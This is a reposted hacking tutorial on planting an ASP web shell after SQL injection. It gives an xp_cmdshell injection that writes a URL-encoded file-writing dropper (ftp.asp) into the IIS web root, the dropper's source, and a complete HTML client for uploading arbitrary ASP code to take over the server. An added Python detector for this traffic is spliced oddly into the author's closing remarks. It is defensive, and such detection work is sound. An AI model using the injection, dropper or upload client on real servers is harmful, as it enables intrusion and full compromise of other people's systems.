SQL injection with ASP Trojans upload

xiaoxiao, 2021-03-05

After a successful SQL injection, getting a Trojan (web shell) onto the server has always been a headache. Here is another way to upload one.

1. During the SQL injection, use xp_cmdshell to write an ASP file onto the server that can itself write files.

File content:

<%
Set objFSO = Server.createObject("Scripting.FileSystemObject")
Set objCountFile = objFSO.createTextFile(request("mypath"), True)
objCountFile.Write request("mydata")
objCountFile.Close
%>

This file can also be written on a single line (VBScript statements separated by colons):

<% Set objFSO = Server.createObject("Scripting.FileSystemObject"): Set objCountFile = objFSO.createTextFile(request("mypath"), True): objCountFile.Write request("mydata"): objCountFile.Close %>

With the special characters URL-encoded (so that <, % and " survive the request), the code becomes:

%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.close%25%3E

The injected statement (here the web directory is c:/inetpub/wwwroot/):

exec master..xp_cmdshell 'echo "%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.close%25%3E" > c:/inetpub/wwwroot/ftp.asp';

This generates an ftp.asp file in the server's web directory.

The content of that file is:

<%
Set objFSO = Server.createObject("Scripting.FileSystemObject")
Set objCountFile = objFSO.createTextFile(request("mypath"), True)
objCountFile.Write request("mydata")
objCountFile.Close
%>

As you can see, the code exposes two parameters, mypath and mydata:

mypath is the path at which the next file will be created.

mydata is the content of that file.

Write a client page locally, RohuClient.htm, with the following code:

<html>
<head>
<title>Compromised-host file generator - client. Made by: Absolute Zero QQ: 12216796</title>
<style type="text/css">
<!--
td { font-size: 9pt; line-height: 150% }
body { font-size: 12px; font-family: Verdana, Arial, Helvetica, sans-serif, 宋体; scrollbar-face-color: #eeeeee; scrollbar-highlight-color: #ffffff; scrollbar-shadow-color: #dee3e7; scrollbar-3dlight-color: #d1d7dc; scrollbar-arrow-color: #006699; scrollbar-track-color: #ededed; scrollbar-darkshadow-color: #98aab1 }
a:link { font-size: 9pt; color: #363636; line-height: 18px; text-decoration: none }
a:visited { font-size: 9pt; color: #363636; line-height: 18px; text-decoration: none }
a:hover { color: #cc0000; line-height: 18px; text-decoration: underline }
input, select, textarea { font-family: "Tahoma", "Arial", "Helvetica", "sans-serif", "宋体"; background-color: #f9f9f9; font-size: 9pt; border: 1px #d2d2d2 double; line-height: 120% }
-->
</style>
</head>
<script language="javascript" type="text/javascript">
// Refuse to submit until all three fields are filled in, then point the form at the dropper URL.
function chk(theform) {
    if (theform.ftpurl.value == '') { alert('Please enter the address to submit to!'); theform.ftpurl.focus(); return false; }
    if (theform.mypath.value == '') { alert('Please enter the location of the generated file!'); theform.mypath.focus(); return false; }
    if (theform.mydata.value == '') { alert('Please enter the content of the generated file!'); theform.mydata.focus(); return false; }
    theform.action = theform.ftpurl.value;
}
</script>
<body>
<form name="rohuform" method="post" action="" onsubmit="return chk(this)" target="_blank">
<table width="673" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="11%">Target location:</td>
<td width="79%"><input name="ftpurl" type="text" id="ftpurl" size="50"> Example: http://127.0.0.1/ftp.asp</td>
</tr>
<tr>
<td>Generated file:</td>
<td><input name="mypath" type="text" id="mypath"> The path of the file to be generated on the server. Example: c:/inetpub/wwwroot/server.asp</td>
</tr>
<tr>
<td valign="top">File code:</td>
<td><textarea name="mydata" cols="100" rows="10" id="textarea"></textarea></td>
</tr>
<tr>
<td></td>
<td><input type="submit" name="Submit" value="Submit"></td>
</tr>
</table>
<br>
</form>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr><td align="center">Copyright: Absolute Zero (<a href="http://www.rohu.com">盟</a>)</td></tr>
</table>
</body>
</html>

In the target location box, fill in the URL of the ftp.asp file that was just generated, for example:

http://127.0.0.1/ftp.asp (assuming the server's IP is 127.0.0.1)

In the generated file box, enter the file name to be created on the server, for example: c:/inetpub/wwwroot/server.asp

In the file content box, paste any ASP code you like.

Submit. When http://127.0.0.1/ftp.asp executes on the server, the file is created.

Browse to http://127.0.0.1/server.asp and, heh, the server is yours.

Note: I don't know where this article originally came from or who wrote it.
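From the defender's side, the two requests in this write-up leave distinctive traces: an injected xp_cmdshell that echoes a percent-encoded script into the web root, and a POST to the dropper carrying a file path and `<% ... %>` source as form fields. The detector below is an added example, not part of the original article; it decodes a request's query string or body until stable (because the payload is URL-encoded so that `<%` survives the URL), then applies three checks against constructed sample records modelled on the article's traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed (method, path, query-or-body) records shaped like the article's
# traffic: the xp_cmdshell injection that echoes ftp.asp, then the form POST
# to ftp.asp that creates server.asp. Not real log data.
SAMPLE_REQUESTS = [
    ("GET", "/news.asp", "id=1"),
    ("GET", "/news.asp",
     "id=1;exec%20master..xp_cmdshell%20'echo%20\"%3C%25Set%20objFSO=Server.createObject"
     "(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile"
     "(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):"
     "objCountFile.close%25%3E\"%20>%20c:/inetpub/wwwroot/ftp.asp'"),
    ("POST", "/ftp.asp",
     "mypath=c%3A%2Finetpub%2Fwwwroot%2Fserver.asp&mydata=%3C%25+Response.Write(%22x%22)+%25%3E"),
]

# xp_cmdshell ... echo ... > <path>.asp  (any IIS script-mapped extension)
CMDSHELL_WRITE = re.compile(
    r"xp_cmdshell\b.*?\becho\b.*?>\s*\S+\.(?:asp|aspx|asa|cer|cdx)\b", re.I | re.S)
FSO = re.compile(r"Scripting\.FileSystemObject", re.I)
# a file is created or opened with a path taken straight from the request
WRITE_FROM_REQUEST = re.compile(r"(?:CreateTextFile|OpenTextFile)\s*\(\s*Request\s*\(", re.I)
SCRIPT_OPEN = re.compile(r"<%")


def fully_decode(s: str, rounds: int = 3) -> str:
    """Peel percent-encoding until the string stops changing (bounded rounds)."""
    for _ in range(rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s


def is_dropper_source(src: str) -> bool:
    """True for ASP source shaped like ftp.asp: FSO writes a request-chosen path."""
    return bool(FSO.search(src) and WRITE_FROM_REQUEST.search(src))


def classify_request(method: str, path: str, query_or_body: str) -> list[str]:
    """Return the names of the detections that fire for one request record."""
    decoded = fully_decode(query_or_body)
    hits = []
    if CMDSHELL_WRITE.search(decoded):
        hits.append("xp_cmdshell echo redirected into a script file")
    if is_dropper_source(decoded):
        hits.append("file-writing dropper source carried in the request")
    if method.upper() == "POST" and path.lower().endswith(".asp") and SCRIPT_OPEN.search(decoded):
        hits.append("ASP source submitted as a form field")
    return hits
```

`is_dropper_source` can also be run over the contents of every script file under the web root to find an already-planted ftp.asp; the same pattern fires whether the source arrived in a request or sits on disk.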
I didn't remember it.

Reprint source: https://www.9cbs.com/read-38685.html